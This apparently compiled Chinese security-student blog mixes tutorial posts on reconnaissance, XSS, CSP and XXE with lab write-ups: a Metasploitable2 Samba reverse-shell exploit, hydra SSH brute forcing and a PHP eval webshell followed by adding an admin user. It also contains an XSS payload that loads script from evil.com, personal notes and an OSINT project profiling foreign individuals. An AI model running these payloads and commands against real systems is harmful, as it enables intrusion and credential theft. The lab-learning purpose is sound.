+红队(Red Team)即安全团队最大化模拟真实世界里面的入侵事件,采用入侵者的战术、技术、流程,以此来检验蓝队(Blue Team)的威胁检测和应急响应的机制和效率,最终帮助企业真正提高整个安全建设、安全运营、安全管理等能力。
+红队和渗透测试的区别:
+| + | 渗透 | +红队 | +
|---|---|---|
| 测试范围 | +范围有限 | +范围广,有组织计划 | +
| 攻击程度 | +点到为止 | +真实猛烈 | +
| 目的 | +寻找目标系统不足 | +寻找系统不足,管理不足,提高企业安全建设能力 | +
wappalyzer是一款优秀的网站技术栈识别工具,在谷歌商店的使用人数已经有上百万人。
+
点击扩展程序图标,就可以自动识别。
+结果如下:
+
++所谓知彼知己,百战不殆。尽可能多的收集目标信息,渗透测试工作越容易。
+
如果目标网络规模比较大,则主域都是重点防护区域,我们不妨先进入某个子域。
+子域名检测工具
+在线子域名爆破
+搜索引擎
+
在线DNS侦察
+证书透明度日志查询
+使用谷歌搜索语法
+例如:site:edu.cn intext:后台管理
+
常用端口扫描工具:
+
++CMS是Content Management System的缩写,意为”内容管理系统”。
+
根据网站特征识别出CMS,查找相关漏洞。
+工具:御剑web指纹识别,WhatWeb,WebRobo.
+也可以使用在线网站查询CMS指纹信息.
+++CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。
+
第一步,判断目标网站是否使用CDN服务.
+
第二步,绕过CDN寻找真实IP
+
探测Web目录结构和隐藏的敏感文件.
+常用工具:
+开博以来的第一篇感悟。时常回顾一下过去,看看来时的路,又不断为未来焦虑。回味和展望中,心酸后悔又期待无比。
+认识了很多大佬,“鱼皮”,“编程指北”,都是年龄相近,却又那么遥远的人。我在群里说“要是大一就认识鱼皮,就好了”。跟随前人走过的路,总比自己摸索要好一些吧。
+大学的课程即将上完,回首一看,发现自己和别人真的有很大的差距。洛佳在图书馆敲rust飞快,对面大佬夜晚1点练习口语,Cyrus在我这个年龄已经去大厂工作了。
+而我呢,步步艰难,如履薄冰,虽然能力一般,但还是向前走着。
+另外,也在纠结考研和就业的事情。其实也想多读几年书,在学校多呆几年,这么好的新校区,那么大的图书馆,那么好的单人间。可是,备考一年,读研三年,四年青春,为一个学位证值得吗?我不知道。但总会有人选择不同的路,走下去就好了。就像当时选文理一样,又有什么好纠结的呢。
+以前总是迷茫,不知道大学要干什么,学那么枯燥的东西有什么用。大一面试大创,学长学姐问我:未来打算读研吗?我说,读研是什么呢?保研是什么呢?真的不知道啊,只知道自己考上了一个别人眼中的好大学,沉浸在自我满足中,便开始享受大学生活。
+现在,也该为未来做出一些打算了吧。
+Cyrus,yd0ng,a2u13,很多前辈,都直接就业了。当然,他们都很优秀。
+时间紧迫,春招暑期实习也已经开始了。
+希望这学期能多做几个项目,多挖几个漏洞,多刷几个算法题,多看一些安全文章。
+2021,要加油哇。
+++遇到一个看似简单,却很难得分的题目,记录一下。
+
原题链接:PAT-Basic Level-1010
+设计函数求一元多项式的导数。$x^n$的导数为$n x^{n-1}$
+以指数递降方式输入多项式非零项系数和指数(绝对值均为不超过 1000 的整数)。数字间以空格分隔。
+以与输入相同的格式输出导数多项式非零项的系数和指数。数字间以空格分隔,但结尾不能有多余空格。注意“零多项式”的指数和系数都是 0,但是表示为 0 0。
1 | 3 4 -5 2 6 1 -2 0 |
1 | 12 3 -10 1 6 0 |
0 00 00 01 | a=list(map(int,input().split())) |
xss 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)缩写混淆,所以将跨站脚本攻击缩写为xss。
+xss就是攻击者在web页面插入恶意的Script代码,当用户浏览该页时,嵌入其中web里面的Script代码会被执行,从而达到恶意攻击用户的特殊目的。
+把用户输入的数据“反射”给浏览器(诱使用户点击恶意链接)
+将包含XSS代码的恶意链接发送给目标用户,当目标用户访问该链接时,服务器接受该目标用户的请求并处理,然后把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本,就会触发XSS漏洞。
+把输入数据“存储”在服务器。有很强的稳定性。
+攻击者在发帖的过程中,将恶意脚本连同正常信息注入帖子内容,被服务器存储下来,恶意脚本也永久地被存放在服务器。其他用户浏览这个被注入了恶意脚本的帖子,恶意脚本就会在他们的浏览器中执行。
+不需要经过后端,它是在浏览器解析渲染服务器源码的时候产生的,所以我们在抓包的过程中是看不到dom型xss有关的内容的(WAF无法防护)
+通过修改网页节点形成XSS。基于DOM文档对象模型的一种漏洞。
+DOM-based XSS漏洞是基于文档对象模型Document Objeet Model 的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态的访问或者更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。DOM中有很多对象,其中一些事用户可以操作的.客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格的确认,就会产生DOM-based XSS漏洞。
+XSS不只是弹窗,弹窗只是测试XSS的存在性。
+payload:通过插入javascript代码,控制浏览器,完成各种具体功能.
+通过读取浏览器的cookie对象,攻击者可以不通过密码,直接登陆进入用户的账户.
+可以先加载一个远程脚本,例如:
+1 | http://www.a.com/test.htm/?abc="><script src=http://www.evil.com/evil.js></script> |
为了窃取密码,利用javascript伪造一个登录框,用户输入之后,密码被发送到黑客的服务器上.
+通过读取页面内容,将验证码的图片url发送到远程服务器,攻击者在远程服务器接受当前验证码,并将验证码的值返回给当前XSS payload,从而绕过验证码.
+通过XSS读取浏览器的UserAgent对象.
+但UserAgent可以伪造,可以通过另一种方法,更准确的识别用户浏览器版本.
+分辨浏览器不同版本之间的差异,从而识别成功.
+通过判断ActiveX控件的classid是否存在,来推测用户是否安装了该软件.
+1 | try{ |
收集常见软件的classid,扫描用户电脑中安装的软件列表.
+style的visited属性,访问过的链接,颜色会变化.
+借助第三方软件,比如客户端安装了Java(JRE)环境,那么可以通过调用JavaApplet接口获取客户端本地IP
+条件:用户之间发生交互行为的页面,如果存在存储型XSS,则容易发起XSS Worm攻击.
+1 | <script>alert(1)<script/> |
A记录:指定主机名(或域名)对应的IP地址记录
+cname:别名记录。这种记录允许您将多个名字映射到同一台计算机。
+谷歌语法
+SRC:security response center(安全应急响应中心)
+CMS:内容管理系统。例如:wordpress
+CMS指纹识别:网站使用的开源程序源码系统,可以直接利用其漏洞
+提权:提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。
+XML:可扩展标记语言,XML并非是用来取代HTML的。HTML着重如何描述将文件显示在浏览器中,而XML与SGML相近,它着重描述如何将数据以结构化方式表示。
+webshell:就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
+代码审计:顾名思义就是检查源代码中的安全缺陷,检查程序源代码是否存在安全隐患,或者有编码不规范的地方,通过自动化工具或者人工审查的方式,对程序源代码逐条进行检查和分析,发现这些源代码缺陷引发的安全漏洞,并提供代码修订措施和建议。
+Redis:Key-Value数据库
+域名劫持:通过攻击域名解析服务器(DNS),或伪造域名解析服务器(DNS)的方法,把目标网站域名解析到错误的IP地址从而实现用户无法访问目标网站的目的或者蓄意或恶意要求用户访问指定IP地址(网站)的目的。
+社工库:利用社会工程学攻击时积累的各方数据的数据库
+红队:红队(Red Team)即安全团队最大化模拟真实世界里面的入侵事件,采用入侵者的战术、技术、流程,以此来检验蓝队(Blue Team)的威胁检测和应急响应的机制和效率,最终帮助企业真正提高整个安全建设、安全运营、安全管理等能力。
+蓝队:(甲方)为公司的业务提供积极防御,构建企业安全架构等
+中间件是一类连接软件组件和应用的计算机软件,它包括一组服务。以便于运行在一台或多台机器上的多个软件通过网络进行交互。该技术所提供的互操作性,推动了一致分布式体系架构的演进,该架构通常用于支持并简化那些复杂的分布式应用程序,它包括web服务器、事务监控器和消息队列软件。 中间件(middleware)是基础软件的一大类,属于可复用软件的范畴。顾名思义,中间件处于操作系统软件与用户的应用软件的中间。
+JSON:是一种轻量级的数据交换格式。采用完全独立于编程语言的文本格式来存储和表示数据。简洁和清晰的层次结构使得 JSON 成为理想的数据交换语言。 易于人阅读和编写,同时也易于机器解析和生成,并有效地提升网络传输效率。
+SEO:搜索引擎优化。是一种方式:利用搜索引擎的规则提高网站在有关搜索引擎内的排名。目的是让其在行业内占据领先地位,获得收益。
+DevSecOps:是指先在应用程序开发的生命周期中引入安全性,从而尽可能地减少漏洞并使安全性更接近IT和业务目标。
+DevOps:是一组过程、方法与系统的统称,用于促进开发(软件工程)、技术运营和质量保障(QA)部门之间的沟通、协作与整合。
+xpath:即为XML路径语言(XML Path Language),它是一种用来确定XML文档中某部分位置的计算机语言。
+cookie:Cookie是网站为了辨别用户身份而储存在用户本地终端上的数据(通常经过加密)。因为HTTP本身是无状态协议,即服务器不知道用户上一次的请求的内容和次数,这严重阻碍了交互式Web应用程序的实现。在典型的网上购物场景中,用户浏览了几个页面,买了一盒饼干和两瓶饮料。最后结帐时,由于HTTP的无状态性,不通过额外的手段,服务器并不知道用户到底买了什么。 所以Cookie就是用来绕开HTTP的无状态性的“额外手段”之一。服务器可以设置或读取Cookie中包含信息,借此维护用户跟服务器会话中的状态。
+短网址(Short URL) ,顾名思义就是在形式上比较短的网址。通常用的是asp或者php转向,在Web 2.0的今天,不得不说,这是一个潮流。目前已经有许多类似服务,借助短网址您可以用简短的网址替代原来冗长的网址,让使用者可以更容易的分享链接。
+shell:客户端连接服务器端,想要获取服务器端的shell,那么称为正向shell,如果是客户端连接服务器,服务器端想要获取客户端的shell,那么称为反向shell
+客户端脚本:
+当客户端通过客户浏览器发送HTTP请求时,web服务器将HTML文档部分和脚本部分返回给客户端浏览器,在客户端浏览器中解释执行并及时更新页面,脚本处理工作全部在客户端浏览器执行完成。JavaScript一般是用在客户端(浏览器)上执行的脚本语言。
+内容管理系统(英语:content management system,缩写为 CMS)是指在一个合作模式下,用于管理工作流程的一套制度。该系统可应用于手工操作中,也可以应用到电脑或网络里。作为一种中央储存器(central repository),内容管理系统可将相关内容集中储存并具有群组管理、版本控制等功能。版本控制是内容管理系统的一个主要优势。
+内容管理系统在物品或文案或数据的存储、掌管、修订(盘存)、语用充实、文档发布等方面有着广泛的应用。现在流行的开源CMS系统有WordPress、Joomla!、Drupal、Xoops、CmsTop等。
+在web渗透过程中,Web指纹识别是信息收集环节中一个比较重要的步骤,通过一些开源的工具、平台或者手工检测CMS系统是公开的CMS程序还是二次开发至关重要,能准确的获取CMS类型、Web服务组件类型及版本信息可以帮助安全工程师快速有效的去验证已知漏洞。对目标渗透测试过程中,目标的cms是十分重要的信息,有了目标的cms,就可以利用相关bug进行测试,进行代码审计等。
+在指纹识别的学习过程中,有很多开源的工具和指纹库,如fofa、WhatWeb、w11scan、WebEye
+如/templets/default/style/dedecms.css—dedecms
+如favicon.ico,但是该文件可以被修改导致不准确。
+网站文件命名规则
+返回头的关键字
+网页关键字
+如/data/sessions/index.html——dedecms
+Url特征
+Meta特征
+Script特征
+robots.txt
+网站路径特征
+网站静态资源
+爬虫网站目录信息
+相对比较准确,但是可能有反爬。
+指纹实例
+1 | { |
1、CMS信息:比如大汉CMS、织梦、帝国CMS、phpcms、ecshop等;
+2、前端技术:比如HTML5、jquery、bootstrap、pure、ace等;
+3、Web服务器:比如Apache、lighttpd, Nginx, IIS等;
+4、应用服务器:比如Tomcat、Jboss、weblogic、websphere等;
+5、开发语言:比如PHP、Java、Ruby、Python、C#等;
+6、操作系统信息:比如linux、win2k8、win7、kali、centos等;
+7、CDN信息:是否使用CDN,如cloudflare、360cdn、365cyd、yunjiasu等;
+8、WAF信息:是否使用waf,如Topsec、Jiasule、Yundun等;
+9、IP及域名信息:IP和域名注册信息、服务商信息等;
+10、端口信息:有些软件或平台还会探测服务器开放的常见端口。
+WhatWeb(推荐指数★★★★★)
+地址:https://github.com/urbanadventurer/WhatWeb
+此工具kali自带,使用方法:
+whatweb www.example.com 即可,也可以加参数-v显示更详细的信息。
+Wapplyzer(推荐指数★★★★)
+Wappalyzer可以识别网站上的技术,包括内容管理系统,电子商务平台,JavaScript框架,分析工具,打包工具等等。
+可以在谷歌商店直接下载扩展程序,使用很方便。
+
1.http://whatweb.bugscaner.com/look/
+2.https://pentest.gdpcisa.org/whatcms
+3.https://www.yunsee.cn/(云悉指纹识别,强烈推荐)
+指纹识别是渗透测试信息收集中很重要的一部分,对目标渗透测试过程中,目标的cms是十分重要的信息,有了目标的cms,就可以利用相关bug进行测试,进行代码审计等。很多安全小白学了很久,却依然挖不到洞,一方面是技术还不到位,另一方面是信息收集没做好。所以要明白信息收集的重要性。
+++总结一下常见服务器端口服务
+
详细列表:
维基百科TCP/UDP端口列表
| 端口 | +服务 | +说明 | +
|---|---|---|
| 21 | +FTP | +FTP 服务器所开放的端口,用于上传、下载 | +
| 22 | +SSH | +22 端口就是 ssh 端口,用于通过命令行模式远程连接 Linux 系统服务器 | +
| 25 | +SMTP | +SMTP 服务器所开放的端口,用于发送邮件 | +
| 80 | +HTTP | +用于网站服务例如 IIS、Apache、Nginx 等提供对外访问 | +
| 110 | +POP3 | +110 端口是为 POP3(邮件协议 3)服务开放的 | +
| 137/138/139 | +NETBIOS | +其中 137、138 是 UDP 端口,当通过网上邻居传输文件时用这个端口。而 139 端口:通过这个端口进入的连接试图获得 NetBIOS/SMB 服务。这个协议被用于 windows 文件和打印机共享和 SAMBA | +
| 143 | +IMAP | +143 端口主要是用于“Internet Message AccessProtocol”v2(Internet 消息访问协议,简称 IMAP),和 POP3 一样,是用于电子邮件的接收的协议 | +
| 443 | +HTTPS | +网页浏览端口,能提供加密和通过安全端口传输的另一种 HTTP | +
| 1433 | +SQL Server | +1433 端口,是 SQL Server 默认的端口,SQL Server 服务使用两个端口:TCP-1433、UDP-1434。其中 1433 用于供 SQL Server 对外提供服务,1434 用于向请求者返回 SQL Server 使用了哪个 TCP/IP 端口 | +
| 3306 | +MySQL | +3306 端口,是 MySQL 数据库的默认端口,用于 MySQL 对外提供服务 | +
| 3389 | +Windows Server Remote Desktop Services | +3389 端口是 Windows 远程桌面的服务端口,可以通过这个端口,用 “远程桌面” 等连接工具来连接到远程的服务器 | +
| 8080 | +代理端口 | +8080 端口同 80 端口,是被用于 WWW 代理服务的,可以实现网页浏览,经常在访问某个网站或使用代理服务器的时候,会加上 “:8080” 端口号。另外 Apache Tomcat web server 安装后,默认的服务端口就是 8080 | +
内容安全策略 (CSP, Content Security Policy) 是一个附加的安全层,用于帮助检测和缓解某些类型的攻击,包括跨站脚本攻击(XSS) 和数据注入等攻击。
+这些攻击可用于实现从数据窃取到网站破坏或作为恶意软件分发版本等用途。内容安全策略在现代浏览器中已经包含,使用的是 W3C CSP 1.0 标准中描述的 Content-Security-Policy 头部和指令。
+CSP 的实质就是白名单制度,开发者明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单。它的实现和执行全部由浏览器完成,开发者只需提供配置。
+CSP 大大增强了网页的安全性。攻击者即使发现了漏洞,也没法注入脚本,除非还控制了一台列入了白名单的可信主机。
+CSP 可以由两种方式指定:HTTP Header 和 HTML。HTTP 是在 HTTP 由增加 Header 来指定,而 HTML 级别则由 Meta 标签指定。
+CSP 有两类:Content-Security-Policy 和 Content-Security-Policy-Report-Only。(大小写无关)
+1 | HTTP header : |
HTTP Content-Security-Policy 头可以指定一个或多个资源是安全的,而Content-Security-Policy-Report-Only则是允许服务器检查(非强制)一个策略。多个头的策略定义由优先采用最先定义的。
+1 | HTML Meta : |
Meta 标签与 HTTP 头只是行式不同而作用是一致的。与 HTTP 头一样,优先采用最先定义的策略。如果 HTTP 头与 Meta 定义同时存在,则优先采用 HTTP 中的定义。
+如果用户浏览器已经为当前文档执行了一个 CSP 的策略,则会跳过 Meta 的定义。如果 META 标签缺少 content 属性也同样会跳过。
+针对开发者草案中特别的提示一点:为了使用策略生效,应该将 Meta 元素头放在开始位置,以防止提高人为的 CSP 策略注入。
+++CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。
+
第一步,判断目标网站是否使用CDN服务.
+
第二步,绕过CDN寻找真实IP
+
1 | import argparse |
argparse模块还会自动生成帮助和使用消息,并在用户为程序提供无效参数时发出错误。
default:没有设置值情况下的默认参数
required: 表示这个参数是否一定需要设置
type:参数类型
默认的参数类型是str类型,如果你的程序需要一个整数或者布尔型参数,你需要设置type=int或type=bool
choices:参数值只能从几个选项里面选择
help:指定参数的说明信息
dest:设置参数在代码中的变量名
argparse默认的变量名是--或-后面的字符串,但是你也可以通过dest=xxx来设置参数的变量名,然后在代码中用args.xxx来获取参数的值。
1 | # -*- coding: utf-8 -*- |
++寒假期间参加了字节安全训练营,算是有很多收获吧。学到了一些安全知识,认识了一些小伙伴,都是名牌大学的本科、硕士生。给人的印象是字节的安全工程师比较务实,很有水平。上一节课比在学校上一学期更有用。更加坚定了我去企业的想法。也感觉学术界的安全研究和企业脱节比较严重,在这个工业界引领发展,反哺学术界的时代,或许在企业能学到更多东西吧。
+
+
+官方提供一台云主机,以Dockers镜像的方式预置一个Web漏洞靶场。
+Web应用防火墙(Web Applocation Firewall)
+通过一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的产品
+1.sqlmap
+1 | sqlmap.py -u "https://baidu.com --identify-waf --batch" |
2.手工判断
+1 | ?test=1 union select 1,2,3%23 |
选取不存在的参数,如果被拦截:
+参考我的另一篇博客
+ +另外加几个技巧
+外部实体注入(XML External Entity XML)。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。
+先知社区有一篇关于XXE的文章:
+ +
+
+1 |
|
++在公众号上看到一篇云蜜罐的文章,记录一下
+
参考链接:知道创宇
+ +无需软硬件,无需云主机,不需占用任何客户资源,云端实现快捷部署,并在域名接入功能上取得了突破。
+与传统蜜罐相比,“云蜜罐”除去部署方式上的不同,还有一大优势在于云端部署不需占用任何客户端资源,不会对现有的业务造成任何影响。同时,云端“一键部署”快捷安全,尤其适用于网站防御方面。在即将到来的网络攻防实战演练中,防守方一旦发现预先进行了网络防护的网站有被攻击迹象,比起被动挨打,还可以选择通过快捷部署“云蜜罐”作为一种紧急应对方式,感知攻击威胁、记录攻击痕迹、争取溯源反制。
+为域名暴破攻击提供“定制陷阱”的服务。
+“云蜜罐”智能子域名推荐系统会根据录入的根域名,自动生成高敏感子域名,在攻击者使用子域名暴破攻击的必经之路上设置陷阱,提高攻击捕获可能性,在一定程度上减轻真实资产的流量压力以及防止黑客进一步入侵。
+提示:通关就有flag
+尝试修改start_level,但是无法直接开始第10关
+尝试修改死亡后reset的next_level,然后去送死,按下Esc,就是第二关。
+却发现boss很难打,于是又修改人物参数:血量、飞镖数量等。
+
1 | function Reset() |
打败BOSS,获得flag。
+这游戏挺好玩!
+++最近在做舆情分析的课题,稍微记录一下.
+
课题:境外涉华人物画像
+数量:不少于100
+国家/地区:美日澳印、欧洲、东南亚、俄罗斯、港台
+领域:智库、军情、政治、法律、高科技(人工智能、芯片、通信、电子、材料、太空、航天等)、演艺、人文、知名大学毕业生
+实时跟踪社交媒体动态(Twitter、Facebook、Line、Linkedin)
+社交情况及社交指数
+人格分析:大五人格
+涉华言论(文本、音视频)、热点话题及其情感极性
+对华好感指数
+实时跟踪twitter, facebook等社交媒体动态,生成境外涉华人物画像。人物涉及多个国家地区,并分析相应人物的社交指数,大五人格,以及对华好感指数等,并对其涉华言论的情感极性进行深入分析。
+通过可视化,建立图形化界面等技术,从公共社交媒体上利用爬虫爬取公开的涉华人物的相关信息动态,完成预期的目标任务,做成一个能够从公开媒体上爬取并分析信息情报的平台雏形,具有相当的实用价值。
+
+
+
大五人格
+1 | 开放性(openness) |
在不同领域探索对华好感指数
+
PS:此项目小组合作完成 , 源代码暂不公开
+++Metasploitable2是一款很好的渗透测试靶机
+
攻击机:kali IP:192.168.211.140
+目标主机:Metasploitable2 IP:192.168.211.132
+1.使用命令msfconsole进入msf控制台
+
+
+2.使用Nmap扫描,查看目标系统开放端口和服务.
+
+
+3.根据扫描结果选择合适的exploit和payload
+此次使用Samba3.0存在的漏洞进行攻击
+**提示:**在rank栏选择great/excellent的模块,会有很好效果,成功率更高.
+
+
+4.使用攻击模块
+选择exploit/multi/samba/usermap_script
+提示:使用info+模块 查看说明
+
+
+show payloads,查看可用攻击载荷.
+5.设置攻击载荷
+set PAYLOAD cmd/unix/reverse
+设置目标机IP及端口
+设置攻击机IP
+注意:此处的端口号是漏洞服务对应的端口号,在Nmap那一步可以看到.
+show options可以查看payload的配置,Required为不可缺参数
+
+
+6.使用expolit命令进行攻击
+
+
+已成功获取目标主机shell !
+可以使用命令 uname -a 进行验证.
+++ +3sum跟之前的2sum有点像,但难度更大一些
+
1 | Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero. |
范围0 <= nums.length <= 3000
枚举所有方法,时间复杂度n^3,会超时
+排序
+哈希法(2等1)
+循环i,j 此时 t=0-nums[i]-nums[j]
+根据哈希,判断t是否在数组中出现过
+注意:需要去重
+排序
+双指针(1等2)
+t=0-nums[i]-nums[j]
+思路:
+固定i指针,j,k分别在两端,交替向中间靠拢(比较t)
+注意:去重
+1 | class Solution: |
此题题目简单,但是需要考虑的东西也比较细.
+TCP/IP提供了点对点链接的机制,将资料应该如何封装、寻址、传输、路由以及在目的地如何接收,都加以标准化。它将软件通信过程抽象化为四个抽象层,采取协议堆栈的方式,分别实现出不同通信协议。协议族下的各种协议,依其功能不同,分别归属到这四个层次结构之中,常视为是简化的七层OSI模型。
+TCP(传输控制协议)和IP(网际协议)
+TCP/IP 意味着 TCP 和 IP 在一起协同工作。
+TCP 负责应用软件(比如您的浏览器)和网络软件之间的通信。
+IP 负责计算机之间的通信。
+TCP 负责将数据分割并装入 IP 包,然后在它们到达的时候重新组合它们。
+IP 负责将包发送至接受者。
+1.链路层攻击
+在TCP/IP网络中,链路层这一层次的复杂程度是最高的。其中最常见的攻击方式通常是网络嗅探组成的TCP/IP协议的以太网。当前,我国应用较为广泛的局域网是以太网,且其共享信道利用率非常高。以太网卡有两种主要的工作方式,一种是一般工作方式,另一种是较特殊的混杂方式。这一情况下,很可能由于被攻击的原因而造成信息丢失情况,且攻击者可以通过数据分析来获取账户、密码等多方面的关键数据信息。
+2.ARP欺骗
+ARP(地址解析协议)是根据IP地址获取物理地址的一个TCP/IP协议。通常情况下,在IP数据包发送过程中会存在一个子网或者多个子网主机利用网络级别第一层,而ARP则充当源主机第一个查询工具,在未找到IP地址相对应的物理地址时,将主机和IP地址相关的物理地址信息发送给主机。与此同时,源主机将包括自身IP地址和ARP检测的应答发送给目的主机。如果ARP识别链接错误,这样的话ARP直接应用可疑信息,那么可疑信息就会很容易进入目标主机当中。ARP协议没有状态,不管有没有收到请求,主机会将任何受到的ARP相应自动缓存。如果信息中带有病毒,采用ARP欺骗就会导致网络信息安全泄露。因此,在ARP识别环节,应加大保护,建立更多的识别关卡,不能只简单通过IP名进行识别,还需充分参考IP相关性质等。
+3.ICMP欺骗
+ICMP协议也是因特网控制报文协议,主要用在主机与路由器之间进行控制信息传递。通过这一协议可对网络是否通畅、主机是否可达、路由是否可用等信息进行控制。一旦出现差错,数据包会利用主机进行即时发送,并自动反回描述错误的信息。该协议在网络安全当中是十分重要的协议。但由于自身特点的原因,其极易受到入侵,通常而言,目标主机在长期发送大量ICMP数据包的情况下,会造成目标主机占用大量CPU资源,最终造成系统瘫痪。
+4.IP欺骗
+在传输层还存在网络安全问题。如在网络安全领域中,IP欺骗就是隐藏自己的有效手段,主要是通过将自身IP地址进行伪造,并向目标主机发送恶意的请求,攻击主机,而主机却因为IP地址被隐藏而无法准确确认攻击源。或者通过获取目标主机信任而趁机窃取相关的机密信息。在DOS攻击中往往会使用IP欺骗,这是因为数据包地址来源较广泛,无法进行有效过滤,从而使IP基本防御的有效性大幅度下降。此外,在ICMP传输通道,由于ICMP是IP层的组成部分之一,在IP软件中任何端口向ICMP发送一个PING文件,借此用作申请,申请文件传输是否被允许,而ICMP会做出应答,这一命令可检测消息的合法性。所有申请传输的数据基本上传输层都会同意,造成这一情况的原因主要是PING软件编程无法智能识别出恶意信息,一般网络安全防护系统与防火墙会自动默认PING存在,从而忽视其可能带来的安全风险。
+5.DNS欺骗
+对于因特网而言,IP地址与域名均是一一对应的,这两者之间的转换工作,被称为域名解析。而DNS就是域名解析的服务器。DNS欺骗指的是攻击方冒充域名服务器的行为,使用DNS欺骗能将错误DNS信息提供给目标主机。所以说,通过DNS欺骗可误导用户进入非法服务器,让用户相信诈骗IP。另外,PTP网络上接口接受到不属于主机的数据,这也是应用层存在的安全问题,一些木马病毒可趁机入侵,造成数据泄露,从而引发网络安全问题。
+1.不能提供可靠的身份验证
+2.不能有效防止信息泄露
+3.没有提供可靠的信息完整性验证
+4.无法控制资源占有和分配
+真正防御针对网络协议脆弱性的攻击,需要从管理、技术、政策等多方面来配合。希望随着网络安全技术的提高和IPsec的逐步完善,解决现存的协议脆弱性问题。
+3.10
+时常:30min
+1.自我介绍
+2.常用的密码算法,用法是什么
+3.SSL协议
+4.你是怎么学习安全知识的
+5.讲一下你对未来的规划
+6.企业常用的安全防御技术有哪些
+7.项目上的问题,你做了什么贡献。问细节
+面试官应该很年轻,跟我讲了一些他的经历,没有问刁钻的问题,很友好。
+3.16 收到感谢信
+深知自己不足,道路漫长,继续加油!
+随着时代的发展和网络的普及,在世界各国、各层次的计算机网络中,储存着大量公开资料和机密资料,由于网络漏洞的存在,为“黑客”入侵计算机网络系统获取机密资料提供了很多便利,这些资料引起了各国军事情报部门的重视,都大力开展利用计算机网络系统来获取情报资料的研究和尝试,这便是网络侦察。
+网络侦查是指黑客为了更加有效地实施攻击而在攻击前或攻击过程中对目标主机的所有探测活动。网络侦查有时也被称为“踩点”。通常“踩点”包括以下内容:目标主机的域名、IP地址、操作系统类型、开放了哪些端口,以及这些端口后面运行着什么样的应用程序,这些应用程序有没有漏洞等。那么如何收集信息呢?可以利用与技术无关的“社会工程学”、搜索引擎以及扫描工具。
+本实验旨在通过在企业复杂网络场景下的网络侦查应用实战,让学生深刻理解网络侦查的概念、特性和原理,掌握网络侦查相关技术,具备对网络进行侦查、渗透、敏感信息获取以及防网络侦查的技术能力,这对于学生的信息安全技术能力提升、国家网络空间安全战略实施,都有非常重要的意义。
+任务一 使用nmap、ettercap进行网络侦查和密码嗅探;
任务二 使用crunch、hydra暴力破解ssh服务登陆密码;
任务三 使用ssh登录目标机,获得敏感信息;
任务四 获取目标网站的webshell权限,控制目标机,获得敏感信息。
| 操作系统 | +IP地址 | +服务器角色 | +登录账户密码 | +
|---|---|---|---|
| kali Linux | +192.168.1.2 | +操作机 | +用户名:root;密码:Simplexue123 | +
| CentOS7 | +192.168.1.3 | +目标机 | +用户名:root;密码:Simplexue123 | +
| Windows2012 | +192.168.1.4 | +目标机 | +用户名:administrator;密码:Simplexue123 | +
1.扫描存活的主机
+
2.使用嗅探工具对目标机的vsftpd服务进行嗅探。
+通过设置监听网卡、主机、开启arp欺骗、启动嗅探等步骤来嗅探网络内的数据包,获取ftp用户名和密码。
+
利用kali集成的crunch工具,生成密码字典文件。
使用hydra工具暴力破解ssh服务的登陆密码,以便完全控制目标主机系统。
使用命令crunch 9 9 password.txt -p hacker+123456生成密码
生成9位的数字字母组合,输出到password.txt文件
+
使用生成的密码字典进行爆破
+1 | hydra -L hacker.txt -P password.txt -t 1 -vV -e ns 192.168.1.3 ssh |
破解得到密码:hacker123
+使用ssh登录目标机并获取key值,获得敏感信息
+直接利用 爆破得到的密码进行登陆
+ +
ls -a命令列出文件:1.key
+cat 1.key
+ettercap
+获取目标网站的webshell权限,控制目标机,获得敏感信息
+制作一句话木马和上传表单
+1 | <?php @eval($_POST['attack']) ?> |
在浏览器另外一个页面快速打开http://192.168.1.4/index.php?module=eventregistration&action=eventsCalendar,获得时间戳,分析可知上传的文件名以时间戳+下划线+原文件名称来命名。
编写脚本并运行,获得上传的文件的URL路径。
+
写入命令
+http://192.168.1.4/ tmp/1516041535_exp.php?cmd=system('' )
添加新用户net user hacker Beijing123 /add
把hacker用户添加到管理员组,并远程连接目标机,远程连接的时候注意远程连接的端口。
+以hacker用户(用户名:hacker、密码:Beijing123)身份登录目标机系统。
+设置目标机C:\2.key文件的可读权限,并查看该文件的具体内容。
+2021-3-26
+面试官是一位会弹吉他的安全工程师,比较和蔼,没有问刁钻的问题。
+面试时间总共15分钟,我也不知道为啥这么短,可能那边有业务要做吧。
+问题如下:
+1.自我介绍
+2.平时怎么学安全的
+3.每天有多长时间学安全
+4.SQL注入有哪些
+5.给你一个URL,怎么判断注入
+6.SQL注入防范
+7.平时有看安全方面的文章吗,讲一篇
+讲了一下昨晚看的DNSlog注入
+8.讲一下CTF
+9.讲一下你做过的渗透
+最后 你有什么要问的吗?
+1.怎么学习安全
+2.甲方和乙方的安全有什么不同
+面试建议
+其实提前看了几篇美团技术部的文章和面试官写的web蜜罐,但我没讲。
+可以提前查一下面试官的研究方向,如果正好是你擅长的,那就好了。如果是你不擅长的,就尽量把话题引导其他方向,让面试官跟着你的项目走。
